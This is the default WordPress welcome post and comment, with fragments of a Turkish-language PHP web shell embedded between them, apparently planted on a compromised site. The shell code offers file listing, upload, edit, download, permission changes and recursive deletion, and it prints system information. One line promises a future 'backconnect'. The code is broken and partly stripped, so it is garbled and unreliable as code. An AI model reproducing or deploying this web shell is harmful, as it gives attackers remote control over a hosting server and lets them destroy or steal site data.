Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
Yetki degistirecegin yer :$fyetki
"; $chmod0=$_POST['chmod0']; if ($chmod0 <> ""){ chmod ($fyetki , $chmod0); }else { echo "Site yetki degistirmene izin vermiyor knk .s"; } exit(); } ?>
Hakkimda: fazla seye gerek yok xD
"; echo "uname -a : ". php_uname(); echo('
'); echo "
Birdahaki hazirlayacagim sey backconnect olacak sayin :
". ($_SERVER['REMOTE_ADDR']); echo ""; } $homedir=getcwd(); $dir=realpath($_GET['dir'])."/"; if ($id=="fm"){ echo " Bulundugun yer: $homedir
";
echo "
Dosya / Dosya ismi | Boyut Kilobyte | Indir | Duzenle | Yetki degis | Sil |
"; if (is_dir($dir.$file)) { echo " $file dir"; } else { echo " $file "; } echo " | "; if (is_file($dir.$file)) { echo "$fsize"; } else { echo " "; } echo " | "; if (is_file($dir.$file)){ if (is_readable($dir.$file)){ echo "Indir"; }else { echo "No ReadAble"; } }else { echo " "; } echo " | "; if (is_file($dir.$file)) { if (is_readable($dir.$file)){ echo "Duzenle"; }else { echo "No ReadAble"; } }else { echo " "; } echo " | "; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo "Dont in windows"; } else { echo "Yetki"; } echo " | Sil |
---|
"; if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo ""; echo ""; } } $frpath=$_GET['fdelete']; if ($frpath <> "") { if (is_dir($frpath)){ $matches = glob($frpath . '/*.*'); if ( is_array ( $matches ) ) { foreach ( $matches as $filename) { unlink ($filename); rmdir("$frpath"); echo ""; echo ""; } } } else{ echo ""; unlink ("$frpath"); echo ""; exit(0); } } ?>
Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.